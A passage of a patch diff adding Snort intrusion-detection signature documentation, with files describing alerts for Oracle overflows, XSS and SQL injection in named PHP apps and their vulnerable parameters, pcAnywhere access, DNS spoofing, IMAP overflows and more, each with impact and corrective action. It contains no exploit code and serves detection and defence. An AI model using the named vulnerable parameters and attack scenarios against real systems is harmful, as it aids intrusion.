+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/2702.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+2702
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+--
+Affected Systems:
+	Oracle iSQLPlus
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000527.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000527
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "AssoCIateD" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "menu" parameter in the "index.php" script used 
+by the "AssoCIateD" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using AssoCIateD
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1410.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1410
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/646.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 646
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing Sparc Solaris/SunOS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS355
+
+--
--- /dev/null
+++ b/doc/signatures/2293.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2293
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000472.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000472
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "show.php" with SQL commands being passed as the "MAINID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "MAINID" parameter in the "show.php" script used by the 
+"VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1468.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1468
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/507.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+507
+
+--
+Summary:
+This event is generated when an attempt is made to gain administrative 
+rights to a PC running pcAnywhere
+
+--
+Impact:
+Serious. By the very nature of pcAnywhere, without a strong administrative
+password, a successful attack will allow the attacker to gain total 
+control of the machine.
+
+--
+Detailed Information:
+pcAnywhere is a remote control administrative software package produced 
+by Symantec (http://www.symantec.com/pcanywhere/Consumer/features.html) 
+it allows control of a system via network or RAS connection.
+
+--
+Affected Systems:
+	Windows XP Home and Professional
+	Windows 2000 Professional/Server
+	Windows NT Workstation and Server 4.0
+	Windows 98/Me
+
+--
+Attack Scenarios:
+With a copy of pcAnywhere, and attacker can scan a network (port 22) or
+war-dial a series of modems, looking for pcAnywhere signatures.
+
+--
+Ease of Attack:
+Simple. All that is required is an install of pcAnywhere and a host
+to connect to.
+
+--
+False Positives:
+Since pcAnywhere uses the same port as SSH (22) a simple open port scan 
+can show hosts that my not have pcAnywhere installed
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Make sure only servers and workstations that require remote control have
+pcAnywhere installed.
+Make sure that a strong password is required for any level of access, 
+this ideally should be coupled with some for of alternate 
+authentication, such as SecurID, modem callback or be blocked at the 
+external firewall so that the remote control functionality is only 
+available on the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+Symantec PC Anywhere Home Page
+http://www.symantec.com/pcanywhere/Consumer/
+
+RSA:
+RSA SecurID (www.rsasecurity.com/products/securid/)
+
+Arachnids:
+http://www.whitehats.com/info/IDS240
+
+--
--- /dev/null
+++ b/doc/signatures/119-18.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+119-18
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Directory traversal outside the root directory of a web server.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects an
+attempt to escape the root directory of a web server by an attacker
+using a directory traversal technique.
+
+--
+Affected Systems:
+	All web servers.
+
+--
+Attack Scenarios: 
+An attacker may employ a directory traversal technique to escape the
+root directory of a web server in an attempt to access protected system
+files.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/1040.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1040
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS) 
+using the Indexing service. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS using the Indexing service.
+
+The attacker may be trying to gain information on the IIS implementation 
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+This event is generated when an attempt is made to access srchadm, a
+directory used by the Microsoft Index Server.
+
+--
+Affected Systems:
+Any host using IIS and the Index service.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/254.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+254
+
+--
+Summary:
+This event is generated when a specific DNS response is returned. In this case, there are no DNS authority records for the queried address record and has a DNS time-to-live value of one minute. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile IP).
+
+--
+Detailed Information:
+This is presumably from an attacker engaged in a race condition to respond to a legitimate DNS query.  An attacker may sniff a DNS query requeting an address record and attempt to respond before an actual DNS server can.  The spoofed response is atypical because it does not include the authoritative DNS servers in the returned record.  A legitimate DNS response will likely return the names of the authoritative DNS servers.  The response associated with this traffic has a DNS time-to-live value of one minute.  It is suspected that the TTL is set to expire quickly to eliminate any evidence of the spoofed response.
+
+--
+Affected Systems:
+Any DNS server not using DNSSEC.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent a host name to IP pairing.  The forged IP number can direct a user to a potentially hostile IP address.
+
+--
+Ease of Attack:
+The attacker has to be able to sniff DNS queries and generate spoofed responses before the actual DNS server.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+This rule uses very specific DNS flag values that could be modified.  Also, if the DNS TTL value is changed from 1, this rule will not trigger.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1942.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1942
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2237.txt
@@ -0,0 +1,47 @@
+Rule:  
+
+--
+Sid:
+2237
+
+--
+Summary:
+This event is generated when an attempt is made to 
+
+--
+Impact:
+
+--
+Detailed Information:
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1786.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+
+1786
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "raw sex".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "raw sex".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1161.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1161
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1867.txt
@@ -0,0 +1,61 @@
+Nigel - added new references to the rule and bumped up revision number.
+Rule:
+
+--
+Sid:
+1867
+
+--
+Summary:
+This event is generated when a remote user attempts to query the X Display Manager Control Protocol (XDMCP).
+
+--
+Impact:
+Reconnaissance.  An attacker may obtain a list of usernames on the remote host.
+
+--
+Detailed Information:
+The KDE Display Manager (KDM) provides a network protocol XDMCP to supply a graphical login screen.  It is possible to use this protocol to list the users on the remote host running XDMCP.  This provides reconnaissance and may be a precursor of attempting a brute force password attack of the revealed usernames.
+
+--
+Affected Systems:
+Any host running XDMCP.
+
+--
+Attack Scenarios:
+An attacker may obtain a list of current usernames on the remote host as a precursor of attempting a brute force attack to guess passwords of those users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block inbound XDMCP traffic.
+
+Disable XDMCP as a listening service on the remote host unless it is required.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS476
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10891
+
+--
--- /dev/null
+++ b/doc/signatures/1838.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid: 1838
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SecureCRT SSH client.
+
+--
+Impact:
+System compromize presenting the attacker with either the opportunity to
+execute arbitrary code or crash the client.
+
+--
+Detailed Information:
+Van Dyke Technologies SecureCRT is a client program that allows users to
+connect to servers running the Secure Shell (SSH) daemon for remote 
+access via an encrypted TCP session.
+
+A flaw in the SecureCRT client may result in arbitrary code execution 
+with the privileges of the user running the client.
+
+A buffer overflow can be caused by a server sending an overly long 
+identifier string when using the SSH-1 protocol.
+
+--
+Affected Systems:
+	Van Dyke Technologies SecureCRT prior to version 4.0 beta 1
+
+Not affected:
+	Van Dyke Technologies SecureCRT versions 3.2.2, 3.3.4, 3.4.6 and 4.0 beta 3.
+
+--
+Attack Scenarios:
+The attacker would need to send overly large SSH version 1 identifier 
+string to cause the overflow.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Securityfocus:
+http://www.securityfocus.com/bid/5287
+
+--
--- /dev/null
+++ b/doc/signatures/1842.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1842
+
+--
+Summary:
+This event is generated when a remote attacker sends a malformed
+argument in the LOGIN command to an internal IMAP server, indicating an
+attempt to exploit a buffer overflow vulnerability in Netscape Messaging
+Server and University of Washington IMAP implementations. This may also
+affect other IMAP server implementations.
+
+--
+Impact:
+Remote execution of arbitrary code with the security privileges of the
+IMAP process, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+A buffer overflow vulnerability exists in the LOGIN command in
+University of Washington IMAP and Netscape Messaging Server. This can
+allow a remote attacker to send an LOGIN command with a malformed,
+overlong argument to a vulnerable IMAP server, causing a buffer overflow
+condition. The attacker can then execute arbitrary code on the server
+with the security privileges of the IMAP server process.     
+
+--
+Affected Systems:
+	Netscape Messaging Server 3.55 and earlier
+	University of Washington imapd 10.234 and earlier.
+	Ipswitch iMail 5.0
+
+--
+Attack Scenarios:
+An attacker sends an overly long, malformed argument to an LOGIN command
+to a vulnerable IMAP server, causing a buffer overflow condition. The
+attacker is then able to execute arbitrary code on the server with the
+security privileges of the IMAP server process.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Patches have been released for both UW IMAP and Netscape Messaging
+Server. Apply the patch or upgrade to a Netscape Messaging Server
+version higher than 3.55 or UW IMAP version higher than 10.234.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/130
+
+--
--- /dev/null
+++ b/doc/signatures/2518.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2518
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2997.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2997
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2170.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2170
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/554.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+554
+
+--
+Summary: 
+This event is generated when an attempt is made to create a directory name that begins with a "/ " on an FTP server.
+
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to create a directory name that begins with "/ " on an FTP server, possibly in preparation to store unauthorized files.
+
+--
+Detailed Information: 
+An attacker may attempt to create a hidden directory name that begins with "/ " on an FTP server .  This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software.
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may attempt to create a hidden directory name that begins with "/ " to store unauthorized files.
+
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives: 
+None Known.
+
+--
+False Negatives: 
+Hidden directories other than those with a name that begins with a "/ " may be created to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000539.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000539
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "thinkWMS" application running on a webserver. Access to 
+the file "printarticle.php" with SQL commands being passed as the "id" 
